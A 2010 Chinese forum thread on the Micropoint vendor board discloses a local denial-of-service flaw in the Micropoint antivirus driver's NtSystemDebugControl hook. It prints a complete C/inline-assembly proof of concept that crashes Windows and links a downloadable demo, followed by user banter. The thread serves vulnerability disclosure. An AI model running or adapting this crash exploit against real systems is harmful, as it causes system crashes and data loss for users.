微点交流论坛

标题: 【已解决】360mj0011: 微点bsod_fun_2 NtSystemDebugControl Hook本地拒绝服务漏洞 [打印本页]

作者: 点饭的百度空间 时间: 2010-4-6 20:23 标题: 【已解决】360mj0011: 微点bsod_fun_2 NtSystemDebugControl Hook本地拒绝服务漏洞

微点主动防御 mp110013.sys <= 1.3.10123.0 NtSystemDebugControl Hook 本地拒绝服务漏洞
2010-04-06 20:13

产品版本：微点主动防御：mp.100323.1.2.10581.0278.r1

文件版本：mp110013.sys 1.3.10123.0 timestamp:4BA1863F checksum 1e7b8

问题：没有正确处理NtSystemDebugControl WriteVirtual/WritePhysical 中的 Address/Buffer成员，引发拒绝服务漏洞

测试程序：http://mj0011.ys168.com 漏洞演示目录下 mpbsod_fun_2.rar,运行后系统即崩溃

typedef struct _SYSDBG_VIRTUAL {
PVOID Address;
PVOID Buffer;
ULONG Request;
} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL;
int main(int argc, char* argv[])
{

printf("Micropoint Local D.O.S Vulnerability\n"
"BSOD Micropoint for fun!\n"
"By MJ0011\nth_decoder$126.com\n\nPress Enter...\n");
getchar();

SYSDBG_VIRTUAL sbv ;
sbv.Address = (PVOID)0x80000000;

PVOID pAddr = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtSystemDebugControl");

__asm
{
push 0
push 0
push 0
lea eax , sbv
push eax
push 0xb
call pAddr
}
return 0;
}

[ Last edited by Legend on 2010-4-27 at 13:42 ]

作者: snhao 时间: 2010-4-7 12:56
呵，这个好。很久没看到MJ同志爆微点漏洞了，以为他不再关注微点了。

作者: snhao 时间: 2010-4-7 13:06
微点要是想有所作为应该主动请求别人帮助寻找漏洞，而不是等别人来帮你找。

作者: 饭桶小白 时间: 2010-4-7 14:44
怎么不见版主的呢？！

作者: 王子的天下 时间: 2010-4-8 03:30
教大家一招，开始—微点主动防御软件（Micropoint）— 卸载微点主动防御软件，完美过为微点哈哈，你最牛。

作者: 市公司 时间: 2010-4-8 17:05
哎。。。。现在谁好谁坏不是辨别啊

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn